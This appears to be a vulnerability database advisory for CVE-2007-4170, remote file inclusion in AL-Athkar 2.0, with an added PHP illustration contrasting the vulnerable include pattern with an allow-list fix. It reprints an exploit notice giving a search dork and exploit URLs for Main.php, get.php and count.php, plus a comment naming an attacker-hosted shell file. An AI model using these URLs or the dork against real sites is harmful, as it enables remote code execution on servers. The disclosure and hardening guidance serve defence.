AL-Athkar Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID 1189544 Vulnerability type Unknown
Published 2007-08-07 Updated 2007-08-07
CVE ID CVE-2007-4170 CNNVD ID CNNVD-200708-090
Platform N/A CVSS score 10.0
|Sources
https://www.securityfocus.com/bid/85503
https://cxsecurity.com/issue/WLB-2007080031
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-090
|Details
Multiple PHP remote file inclusion vulnerabilities exist in AL-Athkar 2.0. A remote attacker can execute arbitrary PHP code via a URL in (1) the include parameter to (a) Main.php and (b) get.php, and (2) the exec parameter to (c) count.php. This is the classic PHP remote file inclusion pattern: the parameter value reaches an include-type statement without validation, so on a server that permits URL includes the attacker-supplied file is fetched and executed with the web server's privileges.
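As an added illustration (not code from this page or from the AL-Athkar project, whose source the advisory does not reproduce), the following PHP shows the include pattern the description implies, with the exact vulnerable line, the page names and the file paths all assumed, beside a hardened allow-list version that accepts none of the URLs listed in the Exploit section:

```php
<?php
// Added illustration for this page, not AL-Athkar's real source: the advisory
// names the parameters (Main.php?include, get.php?include, count.php?exec) but
// does not reproduce the code, so the vulnerable shape below is an assumption
// of the usual pattern behind a PHP remote file inclusion, followed by a
// hardened replacement.

// ---------------------------------------------------------------------------
// Vulnerable pattern (assumed). Before PHP 5.2.0, allow_url_fopen=On was
// enough for include() to fetch and execute "http://attacker.example/shell.txt";
// from 5.2.0 on, the separate allow_url_include directive gates that. Even
// with remote URLs blocked, the same line still allows local file inclusion
// (../../../etc/passwd, php://filter).
// ---------------------------------------------------------------------------
function vulnerable_page(): void
{
    // count.php?exec=... and get.php?include=... would look the same.
    include $_GET['include'];
}

// ---------------------------------------------------------------------------
// Hardened replacement: map the request onto a fixed allow-list and never use
// the raw parameter as a path. Remote URLs, traversal sequences, stream
// wrappers and null bytes are all rejected because the user string is only
// ever used as an array key. (Page names and paths here are hypothetical.)
// ---------------------------------------------------------------------------
const PAGE_MAP = [
    'home'   => 'pages/home.php',
    'athkar' => 'pages/athkar.php',
    'about'  => 'pages/about.php',
];

function resolve_page(string $requested): ?string
{
    return array_key_exists($requested, PAGE_MAP) ? PAGE_MAP[$requested] : null;
}

function safe_page(): void
{
    $requested = isset($_GET['include']) ? (string) $_GET['include'] : 'home';
    $relative  = resolve_page($requested);
    if ($relative === null) {
        http_response_code(404);   // unknown key: do not fall back to user input
        exit;
    }

    // Defence in depth: confirm the resolved file still lives under the app
    // directory, so a bad entry in PAGE_MAP cannot escape it either.
    $base = realpath(__DIR__);
    $real = realpath($base . '/' . $relative);
    if ($real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(404);
        exit;
    }
    include $real;
}

// Server-side backstop in php.ini. It does not remove the local-inclusion
// half of the bug, but it closes the remote-execution path this advisory
// describes:
//   allow_url_include = Off
//   allow_url_fopen   = Off   ; unless other code legitimately needs it
```

The key property of the hardened form is that no byte of `$_GET['include']` ever becomes part of a filename; the parameter selects an entry from a constant map or is rejected. The `realpath` check is a second layer for the case where the map itself is later edited carelessly.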
|Exploit
Discovered By : Hasadya Raed
----------------------------
Contact : RaeD (at) BsdMail (dot) Com [email concealed] , Hacker_Web (at) W (dot) Cn [email concealed] , Gunman_Pump (at) Hotmail (dot) Com [email concealed]
----------------------------
Greetz : Fairoz
----------------------------
Script: AL-Athkar.v2.0
----------------------------
Download: http://delmaa.com/upfile/users/AL-Athkar.v2.0.rar
----------------------------
Dork: "AL-Athkar.v2.0"
----------------------------
B.File: 
index.php
----------------------------
Vuln code:Main.php?include
Vuln code:get.php?include
Vuln code:count.php?exec
----------------------------
Exploit:
Http://www.Victim.com/path/count.php?exec=[Shell-Attack]
Http://www.Victim.com/path/Main.php?include=[Shell-Attack]
Http://www.Victim.com/path/get.php?include=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>
|Affected products
Al-Athkar Al-Athkar 2.0
|References

Source: BUGTRAQ
Name: 20070804 AL-Athkar.v2.0 Remote File Include
Link: http://www.securityfocus.com/archive/1/archive/1/475646/100/0/threaded
Source: XF
Name: alathkar-include-file-include(35818)
Link: http://xforce.iss.net/xforce/xfdb/35818
Source: SREASON
Name: 2964
Link: http://securityreason.com/securityalert/2964